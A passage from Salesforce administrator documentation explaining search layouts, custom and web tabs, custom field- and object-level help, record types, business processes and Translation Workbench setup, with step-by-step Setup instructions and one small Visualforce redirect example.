column customizations for all users checkbox. If selected, all user column customizations within your
organization will be overwritten and set to the organization-wide default settings.

5. Click Save.

See Also:
Managing Page Layouts
Notes on Search Layouts

Notes on Search Layouts

Available in: All Editions

User Permissions Needed

“Customize Application”To change search layouts:

• Search layouts don’t apply to Salesforce CRM Content.

• Search layouts don’t apply to campaign members, opportunity teams, or account teams.

• The search layout doesn’t control which fields are searched for keyword matches. The list of fields searched is the same
across Salesforce.

• You can add up to 10 fields to each search layout.

• You can’t remove unique identifying fields, such as Account Name or Case Number, from the search layouts. These
fields must be listed first in the order of fields in the search layout.

• You can ‘t add long text fields such as Description, Solution Details, or custom long text area fields to search
layouts.

• All fields are available to be added to the search layout even if some fields are normally hidden for the user customizing
the search layout.

• For Enterprise, Unlimited, and Developer Edition organizations, search layouts don’t override field-level security. If a field
is included in the search layout but hidden for some users via field-level security, those users do not see that field in their
search results.

• For Personal, Contact Manager, Group, and Professional Edition organizations, search layouts override page layout settings.
If a field is included in the search layout but hidden in the page layout, that field will be visible in search results.

• The search results layouts for leads, accounts, contacts, and opportunities also apply to the search results displayed when
finding duplicate leads.
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• Formula fields are not available in search result layouts.

• Don’t remove the Phone field from any lookup phone dialogs search layout. If you do, users can’t use the directory search
results to enter a phone number into a SoftPhone dial pad.

• To add a custom button to a list view or search layout, create the custom button for a standard or custom object, giving it
the List Button Display Type. The custom button will be available in the list view and search result layouts for that
object.

Tip:  In account search results, you can visually differentiate business accounts from person accounts by adding the

Is Person Account field, which displays as the person account icon ( ).

You may specify the Is Person Account field as the first column in account search layouts. Otherwise, Account
Name must be the first column.

SETTING UP CUSTOM TABS

What is a Custom Tab?
Custom Object Tabs and Web Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

Visualforce Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

A custom tab is a user interface component you create to display custom object data or other web content embedded in the
application.

The following types of custom tabs are available:

• Custom Object Tabs display the data of your custom object in a user interface tab. Custom object tabs look and function
just like standard tabs.

• Custom Web Tabs display any external Web-based application or Web page in a Salesforce tab. You can design Web
tabs to include the sidebar or span across the entire page without the sidebar.

• Visualforce Tabs display data from a Visualforce page. Visualforce tabs look and function just like standard tabs.

See Also:
Creating Custom Apps
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Defining Custom Tabs
Custom Object Tabs and Web Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

Visualforce Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit custom tabs:

Custom tabs display custom object data or other web content embedded in the application.

• Custom Object Tabs - Create a tab for your custom object data.

• Web Tabs - Create a tab to display other web content.

• Apex Page Tabs - Create a tab that displays a Visualforce page.

Delegated administrators who can manage specified custom objects can also create and customize tabs for those custom objects.

See Also:
What is a Custom Tab?

Creating Web Tabs
Custom Object Tabs and Web Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

Visualforce Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit custom tabs:

Build web tabs so that your users can use your web applications or other websites from within the application.

1. From Setup, click Create > Tabs.
2. Click New in the Web Tabs related list.
3. Choose a layout for the new tab. The full page width spans across the entire page without the sidebar while the column

style allows users to view the sidebar.
4. Click Next.
5. Choose URL for tab type. Choose Custom S-Control if you have previously created a custom s-control that you want

displayed in the web tab.
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Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

6. Enter a label to display on the tab.
7. Click the Tab Style lookup icon to display the Tab Style Selector.

If a tab style is already in use, a number enclosed in brackets [] appears next to the tab style name. Hover your mouse over
the style name to view the tabs that use the style. Click Hide styles which are used on other tabs to filter
this list.

8. Click a tab style to select the color scheme and icon for the custom tab.

Optionally, click Create your own style on the Tab Style Selector dialog if you want to create a custom tab style and your
organization has access to the Documents tab. To create your own tab style:

a. Click the Color lookup icon to display the color selection dialog and click a color to select it.
b. Click Insert an Image, select the document folder, and select the image you want to use.

Alternatively, click Search in Documents, enter a search term, and click Go! to find a document file name that includes
your search term.

Note:  This dialog only lists files in document folders that are under 20 KB and have the Externally Available
checkbox selected in the document property settings. If the document used for the icon is later deleted, Salesforce

replaces it with a default multicolor block icon ( ).

c. Select a file and click OK. The New Custom Tab wizard reappears.

9. Change the content frame height if necessary.
10. Optionally, select the Mobile Ready checkbox to indicate that the web page displays and functions properly in the Salesforce

Classic app.

Selecting the checkbox adds the tab to the list of available tabs for your Salesforce Classic configurations. Before mobilizing
a web tab, review the Salesforce Classic tab considerations to ensure that the pages in your web tabs are compatible with
mobile browsers.

Note:  The Mobile Ready checkbox is only visible if Salesforce Classic is enabled for your organization.

11. Optionally, choose a custom link to use as the introductory splash page when users initially click the tab. Note that splash
pages do not display in the mobile application. Avoid using a splash page if you plan to mobilize the web tab.

12. Enter a description of the tab, if desired, and click Next.
13. Enter the URL or choose the custom s-control that you want to display in the tab. Optionally, copy and paste any merge

fields for data that you want replaced in the link dynamically.

Remember to include the http:// before your URL. User, organization, and API merge fields are available for web tabs.

Optionally, click the preview link to display your web tab.

14. For a URL, choose an encoding setting and click Next.
15. Add the web tab to the appropriate profiles. In Tab Visibility, choose Default On, Default Off, or Tab Hidden to

determine whether the custom tab is visible to users with that profile. The administrator can change this setting later.
16. Check Append tab to users' existing personal customizations to apply the tab visibility settings to all

users.
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17. Specify the custom apps that should include the new tab.
18. Click Save.

Creating Custom Object Tabs
Custom Object Tabs and Web Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

Visualforce Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit custom tabs:

Define a new tab to display the data stored in your custom object records.

1. From Setup, click Create > Tabs.
2. Click New in the Custom Object Tabs related list.
3. Select the custom object to display in the custom tab. If you have not already created the custom object, click create a new

custom object now and follow the instructions in Defining Custom Objects on page 2877.

The label of the new tab is the same as the plural version of the custom object label.

4. Click the Tab Style lookup icon to display the Tab Style Selector.

If a tab style is already in use, a number enclosed in brackets [] appears next to the tab style name. Hover your mouse over
the style name to view the tabs that use the style. Click Hide styles which are used on other tabs to filter
this list.

5. Click a tab style to select the color scheme and icon for the custom tab.

Optionally, click Create your own style on the Tab Style Selector dialog if you want to create a custom tab style and your
organization has access to the Documents tab. To create your own tab style:

a. Click the Color lookup icon to display the color selection dialog and click a color to select it.
b. Click Insert an Image, select the document folder, and select the image you want to use.

Alternatively, click Search in Documents, enter a search term, and click Go! to find a document file name that includes
your search term.

Note:  This dialog only lists files in document folders that are under 20 KB and have the Externally Available
checkbox selected in the document property settings. If the document used for the icon is later deleted, Salesforce

replaces it with a default multicolor block icon ( ).

c. Select a file and click OK. The New Custom Tab wizard reappears.

6. Optionally, choose a custom link to use as the introductory splash page when users initially click the tab.
7. Enter a description of the tab, if desired, and click Next.
8. Choose the user profiles for which the new custom tab will be available:
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• Select Apply one tab visibility to all profiles and choose Default On, Default Off, or Tab Hidden from the drop-down
list.

• Alternatively, select Apply a different tab visibility for each profile and choose Default On, Default Off, or Tab
Hidden from the drop-down list for each profile.

For Professional Edition users and Salesforce Platform One license users, tab visibility is automatically set to Default On.

9. Specify Tab Visibility.

For Enterprise, Unlimited, Developer Edition, and organizations, choose Default On, Default Off, or Tab Hidden in Tab
Visibility to determine whether the custom tab is visible to users with that profile, and click Next. For Professional
Edition organizations, tab visibility is automatically set to Default On. Salesforce Platform One license users, tab visibility
is automatically set to Default On.

If you choose Default On or Default Off, an option is added to the Create New drop-down list in the sidebar so that
users with the “Create” permission can quickly create a new record. For example, if the custom object displayed in the
custom tab is named Expenses, an Expense option appears in this list.

10. Specify the custom apps that should include the new tab.
11. Check Append tab to users' existing personal customizations to add the new tab to your users’ customized

display settings if they have customized their personal display.
12. Click Save.

To further customize the tab:

• Define the page layout for records displayed in the tab. The page layout controls which fields are visible and editable when
users are entering data in the custom tab.

• Specify which fields display to users in the key lists section of the custom object tab home page.

See Also:
What is a Custom Tab?

Managing Custom Tabs
Custom Object Tabs and Web Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

Visualforce Tabs available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and delete custom tabs:

After creating your custom tabs, you can edit or delete them. From Setup, click Create > Tabs to display a list of your
organization’s custom tabs, web tabs, and Visualforce tabs. Use this page to view, create, edit, or delete custom tabs.

• To view details for a custom tab, click the custom tab name.
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• To change the properties of a custom tab, click Edit, make the appropriate changes, and click Save. Before changing the
Splash Page Custom Link, see Defining Home Tab Components on page 2828 for information about creating a custom
link to use as a splash page for your custom tab.

• To remove a custom tab, click Del.
• To create a new custom tab, click New.

• To enable Visualforce or web tabs for mobile users, edit the properties of the tabs and select the Mobile Ready checkbox.

CUSTOMIZING HELP

Custom Help Overview
Available in: All Editions except Database.com

The Help & Training link at the top of every page opens the Salesforce Help & Training window which includes online help
topics, solutions, and recommended training classes. Additionally, the Help for this Page link on any page opens a
context-sensitive online help topic that describes that page.

Salesforce custom help functionality allows you to augment these standard help features with information on using fields and
functionality unique to your organization or the Force.com AppExchange app you are developing.

Custom help allows you to:

• Override the standard Salesforce context-sensitive online help topics for your custom objects using object-level help

• Add field-level help that displays when users hover their mouse over a field

See Also:
Getting Started with Field-Level Help
Getting Started with Object-Level Help

Getting Started with Field-Level Help
Field-level help allows you to provide help text detailing the purpose and function of any standard or custom field. You can
define custom help text for your organization's fields to provide users with a helpful description for any field on all detail and
edit pages where that field displays. Users can view the field-level help text by hovering over the Info icon next to the field.

Before you begin defining field-level help, review these implementation tips and best practices.

Implementation Tips

• Field-level help is enabled by default for all editions.
• Field-level help is not available for some standard fields, including fields on the User object, system read only fields,

auto-number fields, multi-currency fields, Ideas fields, and Community fields.
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• The help text for a field is automatically added to a package when you add the associated field to any Force.com AppExchange
package.

• In a managed package, the help text is locked to the developer, giving installers full capabilities to change it.

Best Practices

• Because your custom help text displays on both edit and detail pages, avoid instructions for entering data. Instead, construct
help text that defines the field's purpose, such as:

The maximum discount allowed for this account.

• Provide information in your help text about the attributes of the field, such as:

A detailed description of the purpose for the expense report. Up to 32 KB of data
are allowed. Only the first 255 characters display in reports.

• Provide examples in your help text that help users understand the field's meaning clearly, such as:

The four-digit promotional code used to determine the amount charged to the customer,
for example, 4PLT (for level-four platinum pricing).

• If your organization uses more than one language, provide translations for your Help Text using the Translation
Workbench.

See Also:
Custom Help Overview
Defining Field-Level Help

Defining Field-Level Help
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To define or change field-level help:

Field-level help allows you to provide help text detailing the purpose and function of any standard or custom field. You can
define custom help text for your organization's fields to provide users with a helpful description for any field on all detail and
edit pages where that field displays. Users can view the field-level help text by hovering over the Info icon next to the field.

To define field-level help:

1. Select the field for which you want to define custom help text:

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.

2. Click Edit next to the field.
3. In the Help Text field, enter the text you want displayed when a user hovers the mouse over the Info icon that appears

adjacent to the field on a detail or edit page. You can enter up to 255 characters.
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4. Click Save.

See Also:
Custom Help Overview
Getting Started with Field-Level Help

Getting Started with Object-Level Help
Object-level help gives you the power to override the Salesforce Help for this Page links for any custom object with your
custom help content contained in a Visualforce page or an s-control. The Help & Training link at the top of any page always
opens the Salesforce Help & Training window, yet every Help for this Page link on your custom object pages opens the
content in the s-control you select. Your users can access this content from the custom object home (overview), detail, and
edit pages as well as any list views and related lists.

Before you begin defining object-level help text for your custom objects, review these implementation tips and best practices.

Implementation Tips

• Object-level help is available for all custom objects in the Salesforce editions that support custom objects. For more
information, see Salesforce Limits.

• For maximum functionality and ease of development, use Visualforce pages rather than s-controls.
• When creating a Visualforce page to use for your object level help, create your page without a controller or with a custom

controller. You cannot use a standard controller or a standard list controller.
• When creating an s-control to use for your object-level help, select HTML or URL:

◊ For an HTML s-control, write your help content directly into the s-control body using HTML markup.
◊ For a URL s-control, enter the URL of your help content. The URL can be an external website that hosts your help

content, or it can be a relative path to a static resource that contains your help content.

• If you have defined object-level help for a custom object that you add to a Force.com AppExchange package, Salesforce
automatically adds the Visualforce page, static resource, or s-control referenced in your Context-Sensitive Help
Settings for that object.

• In managed packages, object level help is locked to the developer, giving installers the ability to change it if needed.

Best Practices

• The window that displays your object-level help has the same height and width dimensions as the standard Salesforce
Help & Training window. Be sure to size and style your content appropriately to increase usability of your custom help
content.

• To give your custom help a professional tone using Salesforce terminology, follow the Salesforce.com Style Guide for
Documentation and User Interface Text. To use the Salesforce styles, use Visualforce to design your pages.

• Because Visualforce pages or s-controls are the source of your object-level help content, you can use merge fields or other
functions to make the experience more personalized. For example, you can design the custom help to address the user
directly by adding the user's name to the help page when it is displayed.

See Also:
Custom Help Overview
Defining Object-Level Help
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Defining Object-Level Help
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To define or change object-level help:

Object-level help overrides the Help for this Page links for any custom object with your own custom help content contained
in a Visualforce page or an s-control. To make object-level help available to all your users, simply create a Visualforce page or
an s-control that contains your help content and edit the custom object definition to reference that Visualforce page or s-control.
Object-level help becomes available to all your users instantly.

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

To define object-level help for custom objects:

1. Create a Visualforce page or an s-control of type HTML or URL that contains your help content.

• For a Visualforce page, create a Visualforce page that does not use a controller, or that uses a custom controller. Standard
controllers and standard list controllers cannot be used with pages that display object-level help.

• For an HTML s-control, write your help content directly into the s-control body using HTML markup.
• For a URL s-control, enter the URL of your help content. The URL can be an external website that hosts your help

content, or it can be a relative path to a static resource that contains your help content.

2. Edit the custom object definition that should use this custom help when users click the Help for this Page link for these
custom object records.

3. Choose Open a window using a Visualforce page or Open a window using a custom s-control from
Context-Sensitive Help Setting.

4. Select the Visualforce page or s-control that contains your help content.
5. Click Save.

Tip:

You can use the action attribute on a <apex:page> component to redirect from a Visualforce page to a static
resource. This functionality allows you to add rich, custom help to your Visualforce pages. For example, to redirect
a user to a PDF:

1. Upload the PDF as a static resource named customhelp.
2. Create the following page:

<apex:page sidebar="false" showHeader="false" standardStylesheets="false"
action="{!URLFOR($Resource.customhelp)}">

</apex:page>

Notice that the static resource reference is wrapped in a URLFOR function. Without that, the page does not redirect
properly.
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Tip: To give your custom help a professional tone using Salesforce terminology, follow the Salesforce.com Style Guide
for Documentation and User Interface Text. To use the Salesforce styles, use Visualforce to design your pages.

See Also:
Custom Help Overview
Getting Started with Object-Level Help

Replacing Salesforce Online Help
Organizations that have renamed standard tabs, objects, fields, and other related user interface labels can also replace the
Salesforce online help with another URL. Users can view this URL whenever they click on any context-sensitive help link on
an end-user page or within their personal settings. After you replace the help, the Help & Training link at the very top of
every page and all Setup pages will continue to display Salesforce online help.

1. From Setup, click Customize > Tab Names and Labels > Help Settings.
2. Enter the complete URL for your help file that you would like to replace the Salesforce online help.
3. Click Save.

Notes about Replacing Online Help

• When you replace the Salesforce online help with your own help file, the Help & Training link still displays Salesforce
online help but the Help for this Page links on all pages other than within Setup are no longer context-sensitive. That is,
your help file will open at the same place regardless of which page the user is viewing when they click the link.

• You can make your help context-sensitive by taking advantage of the context-specific parameters that are passed with each
help link. For example, the help link from the Opportunities tab home page is constructed as follows (without any linebreaks):

http://your_help_file.com?loc=help&amp;body=%2Fhelp%2Fdoc%2Fen%2Fhelp2.jsp
&target=opp_overview.htm&section=Opportunities

The values of the target and section parameters are unique for every page within the application. You can parse these
parameters to display context-sensitive help content for your users.

• If your online help file is compatible with the Web browser on your users' mobile devices, you can contact salesforce.com
to enable a custom URL for the online help in Salesforce Classic. If you enable a mobile help URL, the Help link in the
mobile application launches the custom help URL instead of the Salesforce Classic online help. Don't deploy customized
mobile help without testing it thoroughly on all the device models carried by your users. Even if all of your users have the
same type of mobile device, the experience can vary widely depending on which operating system version is installed on
the device.
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USING RECORD TYPES

Record Types Overview
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change record types:

Record types allow you to offer different business processes, picklist values, and page layouts to different users. Record types
can be used in various ways, for example:

• Create record types for opportunities to differentiate your regular sales deals from your professional services engagements
and offer different picklist values for each.

• Create record types for cases to display different page layouts for your customer support cases versus your billing cases.

Record Type Considerations

Keep the following considerations in mind when creating or changing a record type:

• Before creating record types, include all of the possible record type values in your master list of picklists. The master picklist
is a complete list of picklist values that can be used in any record type.

• The master picklist is independent of all record types and business processes. If you add a picklist value to the master
picklist, you must manually include the new value in the appropriate record types. If you remove a picklist value from the
master, it is no longer available when creating new records, but records assigned to that value are unchanged.

• The following special picklist fields are not available for record types because they are used exclusively for sales processes,
lead processes, support processes, and solution processes:

◊ Opportunity Stage
◊ Case Status
◊ Solution Status
◊ Lead Status

You can use these fields to provide different picklist values for different record types by assigning a different process to
each record type.

• Renaming a record type doesn’t change the list of values included in it.
• Person accounts are account records to which a special kind of record type has been assigned. These record types are called

person account record types. Person account record types allow contact fields to be available on the account and allow the
account to be used in many situations as if it were a contact. A default person account record type named “Person Account”
is automatically created when person accounts are enabled for your organization. You can change the name of this record
type, and you can create additional person account record types.

• You cannot delete all the record types for an object if the object is referenced in Apex.
• You cannot deactivate a record type if it is in use by an email routing address for Email-to-Case or On-Demand

Email-to-Case.
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• To create record types for campaign members, from Setup, click Customize > Campaigns > Campaign Members >
Record Types.

Record types can only be assigned to campaign members using the Campaign Member Type field on new or existing
campaigns. To assign record types to campaign members, add the Campaign Member Type field to the campaign page
layout. You must have the Marketing User user permission to change the campaign member type. You can also add a
read-only Campaign Member Type field to the campaign members page layout.

• The following campaign member picklists are not available for record types:

◊ Status

◊ Salutation

◊ Lead Source

• Salesforce recommends creating no more than 200 record types. While there is no limit, organizations may have difficulty
managing their record types if they exceed 200.

When users convert, clone, or create records, the following special considerations apply.

• When a user converts a lead, the new account, contact, and opportunity records automatically use the default record type
for the owner of the new records.

• When a user clones a record, the new record has the record type of the cloned record. If the record type of the cloned
record isn’t available in the user’s profile, the new record adopts the user’s default record type.

• When a user creates a new case or lead and applies assignment rules, the new record can keep the creator’s default record
type or take the record type of the assignee, depending on the case and lead settings specified by the administrator.

See Also:
Viewing and Editing Record Types
Creating Record Types
Overview of Record Type Access
Administrator tip sheet: Tips & Hints for Record Types

Creating Record Types
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change record types:

Tip: Before creating record types, include all of the possible record type values in your master list of picklists. The
master picklist is a complete list of picklist values that can be used in any record type.

To create record types on a standard object:

1. From Setup, click Customize, then select an object.

To create person account record types, from Setup, click Customize > Accounts > Person Accounts.
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To create campaign member record types, from Setup, click Customize > Campaigns > Campaign Members.

2. Click Record Types.
3. Click New.
4. Choose Master from the Existing Record Type drop-down list to copy all available picklist values, or choose an

existing record type to clone its picklist values.

Note: When you create a new record type without cloning an existing one, the new record type automatically
includes the master picklist values for both standard and custom picklists. You can then customize the picklist
values for the record type.

5. Enter a Record Type Label that's unique within the object.
6. Enter a Record Type Name. The Record Type Name refers to the component when using the Web services API and

prevents naming conflicts on package installation in managed packages.
7. For opportunity, case, lead, and solution record types, select a business process to associate with the record type.
8. Enter a description.
9. Select Active to activate the record type.
10. Select Enable for Profile next to a profile to make the record type available to users with that profile. Select the

checkbox in the header row to enable it for all profiles.

Tip: If each profile is associated with a single record type, users will never be prompted to select a record type
when creating new records.

11. For enabled profiles, select Make Default to make it the default record type for users of that profile. Select the checkbox
in the header row to make it the default for all profiles.

12. Click Next.
13. Choose a page layout option to determine what page layout displays for records with this record type:

• To apply a single page layout for all profiles, select Apply one layout to all profiles and choose the page
layout from the drop-down list.

• To apply different page layouts based on user profiles, select Apply a different layout for each profile
and choose a page layout for each profile.

14. Click Save to edit the values of the standard and custom picklists available for the record type, or click Save and New to
create another record type.

See Also:
Viewing and Editing Record Types
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Editing Picklists for Record Types and Business Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change record types:

“Customize Application”To create or change business processes:

To customize the values in record type or business process picklists:

1. Select a record type and click Edit next to one of the picklist fields to customize the values included for the record type.

Or, select a business process to customize the values included in that business process.

2. Add any values from the Available Values box or remove any values from the Selected Values box. Users will be able to
choose from the list of selected values when creating and editing records.

3. Optionally, choose a default picklist value. Some picklists require a default value. The default value in a dependent field is
ignored.

4. Click Save.

Tips for Editing Picklists and Record Types

• The master picklist is independent of all record types and business processes. If you add a picklist value to the master
picklist, you must manually include the new value in the appropriate record types. If you remove a picklist value from the
master, it is no longer available when creating new records, but records assigned to that value are unchanged.

• Renaming a record type doesn’t change the list of values included in it.
• The following special picklist fields are not available for record types because they are used exclusively for sales processes,

lead processes, support processes, and solution processes:

◊ Opportunity Stage
◊ Case Status
◊ Solution Status
◊ Lead Status

You can use these fields to provide different picklist values for different record types by assigning a different process to
each record type.

• The following campaign member picklists are not available for record types:

◊ Status

◊ Salutation

◊ Lead Source

• After creating record types, add the Record Type field to your page layouts if you would like the field displayed on record
detail and edit pages. A user can be associated with several record types. For example, a user who creates marketing
campaigns for both US and European divisions can have both US and European campaign record types available when
creating new campaigns.

Record types can only be assigned to campaign members using the Campaign Member Type field on new or existing
campaigns. To assign record types to campaign members, add the Campaign Member Type field to the campaign page
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layout. You must have the Marketing User user permission to change the campaign member type. You can also add a
read-only Campaign Member Type field to the campaign members page layout.

See Also:
About Custom Fields

Viewing and Editing Record Types
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view record type setup pages:

“Customize Application”To create or change record types:

To view a list of record types, from Setup, click Customize, select an object, and click Record Types. For campaign member
record types, from Setup, click Customize > Campaigns > Campaign Members > Record Types.

• Click New to create a new record type.

• Click Edit to change the name of a record type or deactivate it by deselecting the Active checkbox. Deactivating a record
type does not remove it from any user profiles or permission sets.

Note:  When creating and editing record types for accounts, opportunities, cases, contacts, or custom objects,
check for criteria-based sharing rules that use existing record types as criteria. A record type change may affect
the number of records that the rule shares. For example, let's say you have a record type named “Service,” and you
created a criteria-based sharing rule that shares all Service record types with your service team. If you create another
record type named “Support” and you want these records shared with your service team, you must update the
sharing rule to include Support record types in the criteria.

• Click Del to delete an inactive record type and assign associated records a different record type. To leave the record type
field blank on records associated with the deleted record type, select None.

Note:  Deleting campaign member record types updates the Campaign Member Type field on campaign and
campaign member records.

• Click the name of the record type to edit the picklists associated with it.

• Click Page Layout Assignment to set which page layouts users can see based on profiles and record types.

2850

Viewing and Editing Record TypesUsing Record Types



Note:  You cannot edit or delete a record type for an object if the object is referenced in Apex.

See Also:
Assigning Page Layouts

Managing Multiple Business Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change business processes:

Use multiple business processes to display different picklist values for users based on their profile. Multiple business processes
allow you to track separate sales, support, and lead lifecycles.

Sales Processes

Create different sales processes that include some or all of the picklist values available for the opportunity Stage field.

Lead Processes

Create different lead processes that include some or all of the picklist values available for the Lead Status field.

Support Processes

Create different support processes that include some or all of the picklist values available for the case Status field.

Solution Processes

Create different solution processes that include some or all of the picklist values available for the Status field.

After creating a sales, support, lead, or solution process, assign the process to a record type. The record type determines the
user profiles that are associated with the business process.

To view a list of business processes, from Setup, click Customize, select the appropriate tab link (Opportunity, Case, Lead,
or Solution), and click the Processes link.

• Click New to create a new business process.

• Click Edit to change the name or inactivate the business process.

• Click Del to delete an unused business process.

• Click the name of the business process to edit the picklist values associated with it.

See Also:
Editing Picklists for Record Types and Business Processes
Administrator tip sheet: Tips & Hints for Multiple Business Processes
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Creating Multiple Business Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change business processes:

Follow these steps to create sales processes, support processes, lead processes, and solution processes.

1. From Setup, click Customize, select the appropriate tab link: Opportunity, Case, Lead, or Solution.
2. Click the Processes link.
3. Click New.
4. Choose an existing process to copy its picklist values into the new process. Select Master to copy all available picklist

values.
5. Enter a name and description for the new process. The name must be unique within the tab.
6. Click Save.

All of the available values in the picklist are displayed. Choose the values that you would like included in the new business
process.

Next, add the new business process to a record type, and then make the record type available to users based on profile.
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USING THE TRANSLATION WORKBENCH

Setting Up the Translation Workbench
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Translation”To add or edit languages:

“Manage Translation”To assign translators:

“Manage Translation”To export or import translation files:

“View Setup and Configuration”

AND

Be designated as a translator

To translate terms:

“View Setup and Configuration”

AND

“Customize Application”

To override terms:

The Translation Workbench lets you specify languages you want to translate, assign translators to languages, create translations
for customizations you’ve made to your Salesforce organization, and override labels and translations from managed packages.
Everything from custom picklist values to custom fields can be translated so your global users can use all of Salesforce in their
language.

Tip:  When creating a custom report type that will be translated into multiple languages via the Translation Workbench,
we recommend that your personal language setting matches your organization's default language. This ensures that
words that will be translated display in the correct language for translators.

When a customized component is translated, changes to that component are tracked and the “Out of Date” indicator is set
when the translations need updating. You can manage translated values for any of the Salesforce supported languages.

Note:  Custom objects are not available in the translation workbench. Use the rename tabs and labels interface for
custom object translation.

Translation Workbench is not available for single-language organizations. If you aren’t sure whether you have a single-language
or multi-language organization, contact salesforce.com.

Enabling the Translation Workbench makes some changes to your Salesforce organization:

• Picklist values must be edited individually. This means you can’t mass edit existing picklist values, though you can still
mass add new values.
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• When picklist values are sorted alphabetically, the values are alphabetical by the organization's default language.

• Reports have a Filter Language drop-down list in the Filters pane of the report builder. Selecting a language will filter
on translated strings for any filter criteria that use the "starts with," "contains," or "does not contain" operator.

• Import files have a Language drop down and all records and values within the import file must be in that language.

• Web-to-Lead and Web-to-Case have a Language drop down before you generate the HTML.

Note: Salesforce assumes all customizations are entered in the organization's default language—global administrators
should work together in the organization's default language.

To enable the Translation Workbench:

1. From Setup, click Translation Workbench > Translation Settings.
2. On the welcome page, click Enable.

Note:  The “Manage Translation” permission is enabled by default in the System Administrator profile.

To disable the Translation Workbench, from Setup, click Translation Workbench > Translation Settings > Disable.

Note:  In a Developer organization with a managed package containing translations, once the Translation Workbench
is enabled, it can't be disabled.

See Also:
Adding and Editing Translated Languages and Translators
Entering Translated Terms
About Updating Translated Terms
Administrator tip sheet: Setting Up the Translation Workbench

Adding and Editing Translated Languages and Translators
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Translation”To add or edit languages:

Use the Translation Workbench to add languages that you support, activate or deactivate a language, assign translators for
that language, and enter translated terms for customizations you've made in your organization's default language.

Note:  The “Manage Translation” permission is enabled by default in the System Administrator profile.

To add or edit translated languages and translators:
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1. From Setup, click Translation Workbench > Translation Settings.
2. Click Add to activate a new language or Edit to change an existing supported language.
3. If adding a new language, choose a language.
4. To make the entered translations available to your users - select Active. Users can change their personal language anytime

whether or not it's active in the Translation Workbench. Selecting Active makes the translations available to the users
in that language.

Tip:  We recommend you don't make a language active until the translators have translated all values.

5. To assign translators for this language, select them from the Available List and click Add. If you don’t see the member
you want to add, enter keywords in the search box and click Find.

Important:  Ensure all translators have the "View Setup and Configuration" permission so that they can begin
translating. Users can only translate languages they're assigned to.

6. Click Save.

See Also:
Setting Up the Translation Workbench
Entering Translated Terms
About Updating Translated Terms

Entering Translated Terms
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”

AND

Be designated as a translator

To translate terms:

To enter translations:

1. From Setup, click Translation Workbench > Translate.
2. Select the Language you're translating into.
3. Select a Setup Component. Click the pull-down menu to select from the list of translatable customizations. See

Translatable Customizations for a complete list of possible customizations.
4. If necessary select an object and aspect. For example, workflow tasks have an object (Account, Contact, etc.) and aspect

(Subject or Comment).
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5. Double click in the translation column to enter new values. You can press TAB to advance to the next editable field or
SHIFT-TAB to go to the previous editable field.

Note:  The Out of Date column indicates that the item has been updated and the term may need translating.
When editing a button or link label, you see the Button or Link Name column, which is used to refer to the
component when using the SOAP API.

6. Click Save.

See Also:
About Updating Translated Terms
Adding and Editing Translated Languages and Translators

Entering Overrides to Translations in Managed Packages
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”

AND

“Customize Application”

To override terms:

Although you can't edit labels or translations in a managed package, they are controlled by the developer, you can override
them with the Translation Workbench. For example, if there is a custom field in a package you'd like to change, you can
override it.

To enter overrides to managed packages:

1. From Setup, click Translation Workbench > Override.
2. Select the Package you are overriding.
3. Select the Language you're entering your overrides in.
4. Select a Setup Component. Click the pull-down menu to select from the list of translatable customizations. See

Translatable Customizations for a complete list of possible customizations.
5. If necessary select an object and aspect. For example, workflow tasks have an object (Account, Contact, etc.) and aspect

(Subject or Comment).
6. Double click in the override column to enter new values. You can press TAB to advance to the next editable field or

SHIFT-TAB to go to the previous editable field.

Note:  The Out of Date column indicates that the item has been updated and the term may need to be changed.
When editing a button or link label, you see the Button or Link Name column, which is used to refer to the
component when using the SOAP API.
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7. Double click in the translation column to enter new values. You can press TAB to advance to the next editable field or
SHIFT-TAB to go to the previous editable field.

Note:  The Out of Date column indicates that the item has been updated and the term may need translating.
When editing a button or link label, you see the Button or Link Name column, which is used to refer to the
component when using the SOAP API.

8. Click Save.

See Also:
Setting Up the Translation Workbench

Translatable Customizations
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”

AND

Be designated as a translator

To translate terms:

“View Setup and Configuration”

AND

“Customize Application”

To override terms:

To view the translatable customizations in your organization, from Setup select Translation Workbench > Translate > Setup
Component. Then, if needed, select Object, Custom Report Type Entity, or Aspect.

You can translate the following components.

• Apex Sharing Reasons

• Button and Link Labels

